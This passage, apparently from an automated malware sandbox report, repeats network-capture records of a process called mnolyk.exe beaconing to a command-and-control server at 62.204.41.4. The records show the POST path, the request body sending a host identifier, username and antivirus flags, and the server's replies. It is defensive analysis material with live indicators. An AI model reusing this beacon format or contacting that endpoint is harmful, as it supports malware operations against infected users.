                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:40.911724091 CET318INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:40 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          185192.168.2.64990762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:41.092787027 CET318OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:41.156471968 CET319INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:41 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          186192.168.2.64990862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:41.349766970 CET319OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:41.413944960 CET320INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:41 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          187192.168.2.64990962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:41.612708092 CET320OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:41.676428080 CET321INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:41 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          188192.168.2.64991062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:41.844449043 CET321OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:41.908976078 CET322INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:41 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          189192.168.2.64991162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:42.093950033 CET323OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:42.158803940 CET323INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:42 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          19192.168.2.64973762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:00:55.466121912 CET124OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:00:55.530755043 CET124INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:00:55 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          190192.168.2.64991262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:42.328219891 CET324OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:42.390405893 CET324INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:42 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          191192.168.2.64991362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:42.565043926 CET325OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:42.628570080 CET325INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:42 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          192192.168.2.64991462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:42.801956892 CET326OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:42.866264105 CET326INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:42 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          193192.168.2.64991562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:43.056278944 CET326OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:43.119924068 CET327INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:43 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          194192.168.2.64991662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:43.294682980 CET328OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:43.357547045 CET328INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:43 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          195192.168.2.64991762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:43.562458038 CET329OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:43.626914024 CET329INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:43 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          196192.168.2.64991862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:43.801203966 CET330OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:43.862857103 CET330INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:43 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          197192.168.2.64991962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:44.090733051 CET331OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:44.158763885 CET331INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:44 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          198192.168.2.64992062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:44.690558910 CET332OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:44.752736092 CET332INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:44 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          199192.168.2.64992162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:45.051140070 CET333OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:45.115705013 CET333INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:45 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          2192.168.2.64972062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:00:51.202652931 CET24OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:00:51.268384933 CET38INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:00:51 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          20192.168.2.64973862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:00:55.702188015 CET125OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:00:55.765414000 CET125INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:00:55 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          200192.168.2.64992262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:45.348252058 CET334OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:45.411358118 CET334INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:45 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          201192.168.2.64992362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:46.547163010 CET335OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:46.611893892 CET335INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:46 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          202192.168.2.64992462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:46.876099110 CET336OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
